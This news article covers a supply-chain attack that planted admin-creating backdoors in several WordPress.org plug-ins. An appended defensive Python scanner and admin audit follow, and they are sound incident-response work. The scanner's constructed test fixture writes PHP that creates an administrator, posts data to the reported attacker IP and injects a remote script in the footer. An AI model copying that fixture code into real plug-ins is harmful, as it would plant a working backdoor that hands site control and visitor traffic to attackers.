WordPress Supply Chain Attack Spreads Across Multiple Plug-ins

Published: 23/11/2024   Category: security

Injected malicious JavaScript code gives attackers administrator rights on websites, and fills sites with SEO spam.



A threat actor or actors has compromised multiple plug-ins on the WordPress.org site with code aimed at giving attackers administrative privileges as well as conducting further malicious activity.
WordPress.org's Plug-in Review team warned users on Monday that a plug-in called Social Warfare was infected by malicious code, according to a forum post. After noticing the post, Wordfence researchers did some follow-up and discovered several more WordPress.org plug-ins injected with the same code, according to a blog post published by Wordfence on June 24.
In addition to Social Warfare, versions 4.4.6.4 and 4.4.7.1, the affected plug-ins include: Blaze Widget v2.2.5 to 2.5.2; Wrapper Link Element v1.0.2 to 1.0.3; Contact Form 7 Multi-Step Addon v1.0.4 to 1.0.5; and Simply Show Hooks v1.2.1.
Of the plug-ins, Social Warfare (a social-media-themed offering) has the most installations, with more than 30,000; the rest reached no more than hundreds at the most. Still, the presence of the same malicious code across all of them should raise alarm bells, as it suggests attempts at a larger supply chain attack, according to Wordfence.
Social Warfare has been patched in version 4.4.7.3; however, it and all of the affected plug-ins have been delisted and are unavailable for download, at least temporarily, though WordPress.org did not respond when Wordfence reached out about its discovery.
None of the other plug-ins currently have a patched version; however, someone has removed the malicious code from Wrapper Link Element in a current version that's been tagged as 1.0.0, which is lower than the infected versions and thus may make it difficult for users to update, according to Wordfence.
The malicious code injected in the plug-ins attempts to create a new administrative user account and then sends those details back to the attacker-controlled server located at 94.156.79.8, Wordfence threat intelligence lead Chloe Chamberland wrote in the post. The campaign also uses the plug-ins to inject malicious JavaScript into the footer of websites and to add SEO spam throughout it, she said.
The injected malicious code is not very sophisticated or heavily obfuscated and contains comments throughout making it easy to follow, Chamberland added.
The origin of the attack was likely June 21, and attackers were still updating plug-ins about five hours before Wordfence published its post on the attack on June 24. The researchers still don't know exactly how the infection began and are performing a deeper analysis, with updates to follow, she said.
Due to its widespread use as a foundation for websites, the WordPress platform, and its plug-ins especially, is a notoriously popular target for threat actors, giving them easy access to a broad attack surface. Typically, attackers target individual plug-ins with large install bases; however, the new attack suggests that attackers now may be eyeing more ambitious supply chain attacks across multiple plug-ins to broaden the impact of malicious campaigns, according to Wordfence.
As such an attack demands greater vigilance, Wordfence — which focuses on the security of the WordPress platform — is actively working on a set of malware signatures to provide detection for these compromised plug-ins. In the meantime, anyone using any of the plug-ins should remove them from any websites immediately and go into incident-response mode, Chamberland said.
We recommend checking your WordPress administrative user accounts and deleting any that are unauthorized, along with running a complete malware scan to remove any malicious code, she said.
Wordfence also included in the post various indicators of compromise (IoCs) — including known usernames associated with attacker-controlled admin accounts — that WordPress administrators can use to identify evidence of the campaign. Also included is a link to a guide that provides advice on how to clean WordPress-based websites of malicious code.
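As an added example (not Wordfence's code, and not the injected code from the plug-ins), the Python script below shows the two response steps the post recommends: a scan of the wp-content/plugins tree for the attacker-controlled address reported above, combined with heuristics for administrator-account creation and footer script injection, and a comparison of the site's administrator list against a known-good allowlist. The C2 IP is the indicator quoted in the article; the admin-creation and wp_footer heuristics, the sample plug-in files and the usernames are assumptions constructed for this example.

```python
import re
import tempfile
from pathlib import Path

# Indicator of compromise reported by Wordfence in the post above: the
# attacker-controlled server that new admin details were sent to.
C2_IP = "94.156.79.8"

# Assumption (not from the article): a backdoor that creates an administrator
# would use WordPress's standard user APIs. These calls also appear in legitimate
# plug-ins, so a match is a lead for review, not a verdict.
ADMIN_CREATION_PATTERNS = [
    re.compile(r"wp_(?:create|insert)_user\s*\("),
    re.compile(r"set_role\s*\(\s*['\"]administrator['\"]\s*\)"),
]

# Assumption (not from the article): footer injection hooks wp_footer and emits a <script>.
FOOTER_HOOK = re.compile(r"add_action\s*\(\s*['\"]wp_footer['\"]")
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)

SCANNED_SUFFIXES = {".php", ".js", ".html"}


def scan_file(path: Path) -> list[str]:
    """Return the indicator labels found in one file (empty list if nothing matched)."""
    text = path.read_text(errors="ignore")
    found = []
    if C2_IP in text:
        found.append("c2-ip")
    if any(p.search(text) for p in ADMIN_CREATION_PATTERNS):
        found.append("admin-user-creation")
    if FOOTER_HOOK.search(text) and SCRIPT_TAG.search(text):
        found.append("footer-script-injection")
    return found


def scan_plugins(plugins_dir: Path) -> dict[str, list[str]]:
    """Walk a plug-ins directory and map each flagged file (relative path) to its indicators."""
    results = {}
    for path in sorted(plugins_dir.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCANNED_SUFFIXES:
            found = scan_file(path)
            if found:
                results[path.relative_to(plugins_dir).as_posix()] = found
    return results


def unauthorized_admins(admin_usernames: list[str], allowlist: list[str]) -> list[str]:
    """Administrator accounts that are not on the site owner's known-good list."""
    return sorted(set(admin_usernames) - set(allowlist))


def build_sample_plugins_dir() -> Path:
    """Constructed sample tree: one benign plug-in and one showing the described traits."""
    root = Path(tempfile.mkdtemp(prefix="wp-plugins-"))
    benign = root / "hello-benign"
    benign.mkdir()
    (benign / "hello-benign.php").write_text(
        "<?php\n/* Plugin Name: Hello Benign */\n"
        "add_action('init', 'hb_init');\nfunction hb_init() { }\n"
    )
    suspect = root / "widget-sample"
    suspect.mkdir()
    # Constructed fixture: not the real injected code, only the behaviour the article describes.
    (suspect / "widget-sample.php").write_text(
        "<?php\n/* Plugin Name: Widget Sample */\n"
        "$uid = wp_insert_user(array('user_login' => 'x', 'user_pass' => 'y'));\n"
        "$u = new WP_User($uid); $u->set_role('administrator');\n"
        "wp_remote_post('http://" + C2_IP + "/', array('body' => array('u' => 'x')));\n"
        "add_action('wp_footer', 'ws_footer');\n"
        "function ws_footer() { echo '<script src=\"http://" + C2_IP + "/f.js\"></script>'; }\n"
    )
    return root


if __name__ == "__main__":
    root = build_sample_plugins_dir()
    for rel, indicators in scan_plugins(root).items():
        print(f"{rel}: {', '.join(indicators)}")
    # Constructed admin list; on a live site feed it from the database or WP-CLI.
    print("unexpected admins:", unauthorized_admins(["admin", "jane", "wpsvc_1"], ["admin", "jane"]))
```

On a real site, point scan_plugins at wp-content/plugins and feed unauthorized_admins the output of `wp user list --role=administrator --field=user_login`; anything the scan flags should be reviewed by hand, since the admin-creation heuristic is deliberately broad.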
